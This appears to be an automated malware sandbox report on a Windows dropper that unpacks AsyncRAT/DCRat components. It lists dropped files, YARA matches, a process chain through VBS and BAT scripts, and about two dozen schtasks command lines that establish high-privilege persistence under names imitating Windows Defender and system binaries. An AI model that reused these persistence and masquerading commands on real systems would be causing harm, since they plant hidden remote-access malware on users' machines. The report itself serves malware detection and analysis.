                      Source: Joe Sandbox ViewDropped File: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 008EE28C appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 008EE360 appears 52 times
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: String function: 008EED00 appears 31 times
                      Source: Result.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: Result.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Source: Result.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Source: ServerWeb.exe.2.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ywXeiXEvP2.exe, 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs ywXeiXEvP2.exe
                      Source: Result.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 1.3.Result.exe.b10a30.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 1.0.Result.exe.7c9678.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 3.0.XClient.exe.480000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 1.2.Result.exe.b08218.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 1.0.Result.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 1.0.Result.exe.415eec.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: XClient.exe.1.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: XClient.exe.1.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: XClient.exe.1.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, ef7UDCGv7gcEUFZT1op.csCryptographic APIs: 'TransformBlock'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, ef7UDCGv7gcEUFZT1op.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, g357BcsySpWm2aqpGZs.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, g357BcsySpWm2aqpGZs.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: XClient.exe.1.dr, Settings.csBase64 encoded string: 'rBjz7U/o2BFlwrIwGW6YVD/jeOSVunTMlvpBAz8+qFFueMbxy0zRw9MoYV6Lr0cj'
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, Settings.csBase64 encoded string: 'rBjz7U/o2BFlwrIwGW6YVD/jeOSVunTMlvpBAz8+qFFueMbxy0zRw9MoYV6Lr0cj'
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, Settings.csBase64 encoded string: 'rBjz7U/o2BFlwrIwGW6YVD/jeOSVunTMlvpBAz8+qFFueMbxy0zRw9MoYV6Lr0cj'
                      Source: 1.3.Result.exe.2642c39.0.raw.unpack, fCvAaGJbOISiMM9DuTO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 1.3.Result.exe.2642c39.0.raw.unpack, fCvAaGJbOISiMM9DuTO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, fCvAaGJbOISiMM9DuTO.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 1.0.Result.exe.466afd.1.raw.unpack, fCvAaGJbOISiMM9DuTO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 1.3.Result.exe.b10a30.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: XClient.exe.1.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: XClient.exe.1.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 1.0.Result.exe.7c9678.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@48/39@1/2
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C0183BF8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF7C0183BF8
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeCode function: 0_2_00007FF7C019C260 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF7C019C260
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\Users\user\AppData\Roaming\HypercontainercomponentnetcommonJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeMutant created: \Sessions\1\BaseNamedObjects\ke4QYmw58n6HyeTA
                      Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeMutant created: \Sessions\1\BaseNamedObjects\Local\e78b700b17b507eb7e67e7d398bae13027208301
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: sfxname2_2_008ED5D4
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: sfxstime2_2_008ED5D4
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCommand line argument: STARTDLG2_2_008ED5D4
                      Source: ywXeiXEvP2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeFile read: C:\Windows\win.iniJump to behavior
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: ywXeiXEvP2.exeReversingLabs: Detection: 73%
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeFile read: C:\Users\user\Desktop\ywXeiXEvP2.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\ywXeiXEvP2.exe "C:\Users\user\Desktop\ywXeiXEvP2.exe"
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe"
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe"
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\user\SendTo\sihost.exe'" /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
